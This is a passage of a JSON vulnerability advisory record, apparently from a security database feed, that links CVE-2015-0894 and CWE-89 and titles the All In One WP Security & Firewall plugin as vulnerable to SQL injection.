          "#text": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0894",
          "@id": "CVE-2015-0894",
          "@source": "NVD"
        },
        {
          "#text": "https://www.ipa.go.jp/en/security/vulnerabilities/cwe.html",
          "@id": "CWE-89",
          "@title": "SQL Injection(CWE-89)"
        }
      ],
      "title": "All In One WP Security \u0026 Firewall vulnerable to SQL injection"
    }